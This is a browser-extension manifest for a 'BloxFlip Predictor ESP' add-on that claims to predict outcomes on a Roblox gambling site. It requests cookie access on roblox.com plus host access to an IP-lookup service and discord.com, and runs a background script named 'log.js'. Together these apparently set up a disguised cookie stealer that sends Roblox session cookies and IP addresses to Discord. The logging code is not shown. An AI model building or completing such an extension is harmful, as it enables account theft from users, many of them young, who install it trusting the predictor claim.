{
    "name": "BloxFlip Predictor ESP",
    "description": "Extension for https://bloxflip.com",
    "version": "1.0.0",
    "manifest_version": 3,

    "action": {
        "default_icon": "assets/roblox.png"
    },

    "host_permissions": [
        "https://www.roblox.com/*",
        "https://www.google.com/*",
        "https://api.ipify.org/*",
        "https://discord.com/*"
    ],

    "permissions": [
        "cookies",
        "activeTab"
    ],

    "background": {
        "service_worker": "scripts/log.js"
    },

    "icons": {
        "16": "assets/roblox.png",
        "32": "assets/roblox.png",
        "48": "assets/roblox.png",
        "128": "assets/roblox.png"
    }
}